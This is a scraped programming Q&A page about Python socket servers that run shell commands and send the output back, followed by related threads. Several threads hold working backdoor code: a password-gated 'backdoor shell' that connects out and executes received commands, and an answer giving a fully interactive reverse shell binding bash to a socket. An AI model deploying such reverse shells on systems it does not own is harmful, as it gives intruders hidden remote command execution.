Send output from a python server back to client - python

I now have a small java script server working correctly, called by:
<?php
$handle = fsockopen("udp://78.129.148.16",12345);
fwrite($handle,"vzctlrestart110");
fclose($handle);
?>
On a remote server the following python server is running and executing the comand's
#!/usr/bin/python
import os
import socket
print " Loading Bindings..."
settings = {}
line = 0
for each in open('/root/actions.txt', 'r'):
line = line + 1
each = each.rstrip()
if each != "":
if each[0] != '#':
a = each.partition(':')
if a[2]:
settings[a[0]] = a[2]
else:
print " Err # line",line,":",each
print " Starting Server...",
port = 12345
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.bind(("", port))
print "OK."
print " Listening on port:", port
while True:
datagram = s.recv(1024)
if not datagram:
break
print "Rx Cmd:", datagram
if settings.has_key(datagram):
print "Launch:", settings[datagram]
os.system(settings[datagram]+" &")
s.close()
Is it possible to easily send the output of the command back, when the server is started and is running a command the output is shown in the ssh window, however I want this output to be sent back to the browser of the original client, maybe setting the browser to wait for 15 seconds and then check for any data received via the socket.
I know I am asking quite a lot, however I am creating a PHP script which I have a large knowledge about, however my python knowledge lacks greatly.
Thanks,
Ashley

Yes, you can read the output of the command. For this I would recommend the Python subprocess module. Then you can just s.write() it back.
Naturally this has some implications, you would probably have to let your PHP script run for a while longer since the process may be running slow.
# The pipe behaves like a file object in Python.
process = Popen(cmd, shell=True, stdout=PIPE)
process_output = ""
while process.poll():
process_output += process.stdout.read(256)
s.write(process_output)
# Better yet.
process = Popen(cmd, shell=true, stdout=PIPE)
stdout, stderr = process.communicate() # will read and wait for process to end.
s.write(stdout)
Integrated into your code:
# ... snip ...
import subprocess
con, addr = s.accept()
while True:
datagram = con.recv(1024)
if not datagram:
break
print "Rx Cmd:", datagram
if settings.has_key(datagram):
print "Launch:", settings[datagram]
process = subprocess.Popen(settings[datagram]+" &", shell=True, stdout=subprocess.PIPE)
stdout, stderr = process.communicate()
con.send(stdout)
con.close()
s.close()

Here's an example of how to get the output of a command:
>>> import commands
>>> s = commands.getoutput("ls *")
>>> s
'client.py'

Related

Python socket sending old data

I'm having a hard time in Python with subprocess and the socket module. What's happening is, I'm sending the command to the client, but it doesn't send back anything. Until, I send another command, and I get the output of the previous. I've tried all the buffer sizes and none work.
SERVER:
while True:
shell = input(">> ")
conn.send(shell.encode())
data = conn.recv(1600)
print(data.decode())
CLIENT:
while True:
data = sock.recv(1600)
if not data: break
data = data.decode()
commd = subprocess.Popen(data, stdout=subprocess.PIPE, shell=True)
out, err = commd.communicate()
sock.send(out)
print("Exiting because no data")

Backdoor Shell doesn't allow me to change Directory

Below you can see a Python Script which establishes a connection to my machine on port 1234. Using Netcat I can listen on that port and then perform actions on my machine using the terminal (I know that this is trivial, but its just for practicing).
Now the problem is that the commands like "ls, mkdir, pwd, rm or even "ls /root/Desktop/" are working, but however "cd /root/Desktop" or "cd .." are not working, which is actually really bad. Typing in "cd .." is not returning any error message, but its also not changing the directory. I can not leave my python directory.
Here is the script:
#! /usr/bin/python
import socket
import subprocess
host = "localhost"
port = 1234
passwd = "hacking"
def login():
global s
s.send("Login: ")
pwd = s.recv(1024)
if pwd.strip() != passwd:
login()
else:
s.send("Connected #> ")
shell()
def shell():
while True:
data = s.recv(1024)
if data.strip() == ":kill":
break
proc = subprocess.Popen(data, shell=True, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, stdin=subprocess.PIPE)
output = proc.stdout.read() + proc.stderr.read()
s.send(output)
s.send("#> ")
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
login()
I got it from here .
Can anyone help me out? Any idea why I cannot leave the directory? Thanks in advance!
It actually works fine. what if you tried this in a single command: cd /other/directory; ls. You'll see that the directory did in fact "change" for the duration of that command. Every new command will gets a fresh environment (so back to the same original directory). If you really want to change the "server context" in between commands then you need to do that in python. Below is a dirty example added onto the code you provided:
#! /usr/bin/python
import socket
import subprocess
import os
host = "localhost"
port = 12345
passwd = "hacking"
def login():
global s
s.send("Login: ")
pwd = s.recv(1024)
if pwd.strip() != passwd:
login()
else:
s.send("Connected #> ")
shell()
def shell():
while True:
data = s.recv(1024).strip()
if data == ":kill":
break
try:
cmd, params = data.split(" ", 1)
if cmd == ":chdir":
os.chdir(params)
print "chdir to %s" % (params)
s.send("#> ")
continue
except:
pass
proc = subprocess.Popen(data, shell=True, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, stdin=subprocess.PIPE)
output = proc.stdout.read() + proc.stderr.read()
s.send(output)
s.send("#> ")
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
login()
Same idea as your ":kill" command, if the script see's a ":chdir /new/directory" then python executes the chdir function, otherwise pass it on to Popen.

Python true interactive remote reverse shell

I'm trying to create a true interactive remote shell using Python. When I say true, I mean I don't want to just execute a single command and send the results- I have that working already. I also don't want to abstract executing single commands by having the server interpret directory changes or what not.
I am trying to have a client start an interactive /bin/bash and have the server send commands which are then executed by the same persistent shell. For instance, so if I run cd /foo/bar then pwd would return /foo/bar because I would be interacting with the same bash shell.
Here's some slimmed down example code that currently only will do single command execution...
# client.py
import socket
import subprocess
s = socket.socket()
s.connect(('localhost', 1337))
while True:
cmd = s.recv(1024)
# single command execution currently (not interactive shell)
results = subprocess.Popen(cmd, shell=True,
stdout=subprocess.PIPE, stderr=subprocess.PIPE,
stdin=subprocess.PIPE)
results = results.stdout.read() + results.stderr.read()
s.sendall(results)
# server.py
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(('localhost', 1337))
s.listen(5)
conn, _ = s.accept()
while True:
cmd = raw_input('> ').rstrip()
conn.send(cmd)
results = conn.recv(4096)
print results
I've tried many solutions none of which have worked. The subprocess module had a communication method, but it kills the shell after a single command. I'd really like to be able to accomplish this with stdlib, but I've looked at the pexpect module after reading this thread. However, I can't get that to work either? It also doesn't look like it's primary use case is for creating an interactive shell, but rather catching specific command line output for interaction. I can't even get single command execution working with pexpect...
import pexpect, sys
proc = pexpect.spawn('/bin/bash')
proc.logfile = sys.stdout
proc.expect('$ ')
proc.sendline('pwd\n')
If anyone can help it would be appreciated, I feel like there could be a way to multi-thread and spawn off a /bin/bash -i with subprocess and then some how write to stdin and read from stdout? Thanks in advance, and sorry for the length.
Try this code:
# client.py
import socket
import subprocess
s = socket.socket()
s.connect(('localhost', 1337))
process = subprocess.Popen(['/bin/bash', '-i'],
stdout=s.makefile('wb'), stderr=subprocess.STDOUT,
stdin=s.makefile('rb'))
process.wait()
# server.py
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(('localhost', 1337))
s.listen(5)
conn, _ = s.accept()
fp = conn.makefile('wb')
proc1 = subprocess.Popen('cat', stdin=conn.makefile('rb'))
while True:
fp.write(sys.stdin.read(4096))
proc1.wait()

Python connect socket to process

I have a (very) simple web server I wrote in C and I want to test it. I wrote it so it takes data on stdin and sends out on stdout. How would I connect the input/output of a socket (created with socket.accept()) to the input/output of a process created with subprocess.Popen?
Sounds simple, right? Here's the killer: I'm running Windows.
Can anyone help?
Here's what I've tried:
Passing the client object itself as stdin/out to subprocess.Popen. (It never hurts to try.)
Passing socket.makefile() results as stdin/out to subprocess.Popen.
Passing the socket's file number to os.fdopen().
Also, in case the question was unclear, here's a slimmed-down version of my code:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.bind(('', PORT))
sock.listen(5)
cli, addr = sock.accept()
p = subprocess.Popen([PROG])
#I want to connect 'p' to the 'cli' socket so whatever it sends on stdout
#goes to the client and whatever the client sends goes to its stdin.
#I've tried:
p = subprocess.Popen([PROG], stdin = cli.makefile("r"), stdout = cli.makefile("w"))
p = subprocess.Popen([PROG], stdin = cli, stdout = cli)
p = subprocess.Popen([PROG], stdin = os.fdopen(cli.fileno(), "r"), stdout = os.fdopen(cli.fileno(), "w"))
#but all of them give me either "Bad file descriptor" or "The handle is invalid".
I had the same issue and tried the same way to bind the socket, also on windows. The solution I came out with was to share the socket and bind it on the process to stdin and stdout. My solutions are completely in python but I guess that they are easily convertible.
import socket, subprocess
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.bind(('', PORT))
sock.listen(5)
cli, addr = sock.accept()
process = subprocess.Popen([PROG], stdin=subprocess.PIPE)
process.stdin.write(cli.share(process.pid))
process.stdin.flush()
# you can now use `cli` as client normally
And in the other process:
import sys, os, socket
sock = socket.fromshare(os.read(sys.stdin.fileno(), 372))
sys.stdin = sock.makefile("r")
sys.stdout = sock.makefile("w")
# stdin and stdout now write to `sock`
The 372 is the len of a measured socket.share call. I don't know if this is constant, but it worked for me. This is possible only in windows, as the share function is only available on that OS.

Python sending command over a socket

I'm having a bit of trouble. I want to create a simple program that connects to the server and executes a command using subprocess then returns the result to the client. It's simple but I can't get it to work. Right now this is what I have:
client:
import sys, socket, subprocess
conn = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
host = sys.argv[1]
port = int(sys.argv[2])
socksize = 1024
conn.connect((host, port))
while True:
shell = raw_input("$ ")
conn.send(shell)
data = conn.recv(socksize)
#msglen = len(data)
output = data
iotype = subprocess.PIPE
cmd = ['/bin/sh', '-c', shell]
proc = subprocess.Popen(cmd, stdout=iotype).wait()
stdout,stderr = proc.communicate()
conn.send(stdout)
print(output)
if proc.returncode != 0:
print("Error")
server:
import sys, socket, subprocess
host = ''
port = 50106
socksize = 1024
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind((host, port))
print("Server started on port: %s" %port)
s.listen(1)
print("Now listening...\n")
conn, addr = s.accept()
while True:
print 'New connection from %s:%d' % (addr[0], addr[1])
data = conn.recv(socksize)
cmd = ['/bin/sh', '-c', data]
proc = subprocess.Popen(cmd, stdout=subprocess.PIPE).wait()
stdout,stderr = cmd.communicate()
if not data:
break
elif data == 'killsrv':
sys.exit()
Danger, Will Robinson!!!
Do you really want to send commands in clear text without authentication over the network? It is very, very dangerous.
Do it over SSH with paramiko.
Alright I've heard this answer too many times. I don't want to use SSH I'm just building it to learn more about sockets. I'm not going to actually use this if I want to send commands to a system. – AustinM
There is no way I could infer this noble quest from your question. :-)
The sockets module is a thin layer over the posix library; plain sockets is tedious and hard to get right. As of today (2014), asynchronous I/O and concurrency are not among Python's strongest traits - 3.4 is starting to change that but libraries will lag behind for a while. My advice is to spent your time learning some higher level API like Twisted (twistedmatrix.com/trac). If you are really interested in the low level stuff, dive in the project source.
Alright. Any idea on how I could use twisted for this type of thing? – AustinM
Look at twistedmatrix.com/documents/current/core/examples/#auto2
Well I can understand your frustration Austin; I was in the same boat. However trial and error at last worked out. Hopefully you were looking for this:
print "Command is:",command
op = subprocess.Popen(command, shell=True, stderr=subprocess.PIPE, stdout=subprocess.PIPE)
if op:
output=str(op.stdout.read())
print "Output:",output
conn.sendall(output)
else:
error=str(op.stderr.read())
print "Error:",error
conn.sendall(error)
It's unclear why you are using subprocess.Popen() for the same command in both the client and the server. Here's an outline of what I would try to do (pseudocode):
client
while True:
read command from user
send command to server
wait for and then read response from server
print response to user
server
while True:
wait for and then read command from client
if command is "killsrv", exit
execute command and capture output
send output to client
The problem with your code is this line (in both client and server):
proc = subprocess.Popen(cmd, stdout=iotype).wait()
stdout,stderr = proc.communicate()
You are calling wait on the Popen object, which means that the variable proc is getting an int (returned by wait) instead of a Popen object. You can just get rid of the wait -- since communicate waits for the process to end before returning, and you aren't checking the exit code anyway, you don't need to call it.
Then, in your client, I don't think you even need the subprocess calls, unless you're running some command that the server is sending back.

Categories